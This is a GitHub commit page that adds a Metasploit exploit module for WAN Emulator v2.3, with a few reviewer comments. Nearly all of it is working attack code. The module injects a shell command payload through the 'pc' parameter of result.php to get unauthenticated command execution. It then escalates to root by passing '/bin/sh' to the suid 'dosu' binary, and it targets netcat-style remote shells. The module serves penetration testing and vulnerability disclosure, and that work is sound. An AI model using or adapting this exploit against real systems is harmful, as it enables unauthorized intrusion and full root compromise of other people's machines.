Skip to content

Commit

Permalink
Add WANem v2.3 command execution
Browse files Browse the repository at this point in the history
  • Loading branch information
bcoles committed Sep 8, 2012
1 parent caae54a commit f026591
Showing 1 changed file with 107 additions and 0 deletions.
107 changes: 107 additions & 0 deletions modules/exploits/linux/http/wanem_exec.rb
@@ -0,0 +1,107 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'WAN Emulator v2.3 Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability in WAN Emulator
version 2.3 which can be abused to allow unauthenticated users to execute
arbitrary commands under the context of the 'www-data' user.
The 'result.php' script calls shell_exec() with user controlled data
from the 'pc' parameter. This module also exploits a command execution
vulnerability to gain root privileges. The 'dosu' binary is suid 'root'
and vulnerable to command execution in argument one.
},
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'Privileged' => true,

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Sep 8, 2012

Contributor

Is it right even when privileges are acquires after exploitation? Compatible payload doesn't require privileges, but not sure if this "true" is fully correct. Anyway not a big concern :P

'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'References' =>
[
['URL', 'http://itsecuritysolutions.org/2012-08-12-wanem-v2.3-multiple-vulnerabilities/']
#['OSVDB', ''],
#['EDB', ''],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat-e',
}
},
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 12 2012'
))
end

def on_new_session(client)
client.shell_command_token("/UNIONFS/home/perc/dosu /bin/sh")
end

def check

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Sep 8, 2012

Contributor

A "echo" injection could be used to test if the application is really vulnerable :)


res = send_request_cgi({
'method' => 'GET',
'uri' => '/WANem/result.php'
})
if res and res.body =~ /<br><br><br><b><font color=red>Can't measure\!\! Please repeat\.<\/font><\/b><\/body>/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end

end

def exploit

@peer = "#{rhost}:#{rport}"
data = "pc=127.0.0.1; "
data << URI.encode(payload.raw)

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Sep 8, 2012

Contributor

Maybe Rex::Text.uri_encode could be used. I haven't tested

data << "%26"
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
begin
res = send_request_cgi({
'uri' => '/WANem/result.php',
'method' => 'POST',
'data' => data
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
end
if res and res.code == 200
print_good("#{@peer} - Payload sent successfully")
else
print_error("#{@peer} - Sending payload failed")
end
end

end

0 comments on commit f026591

Please sign in to comment.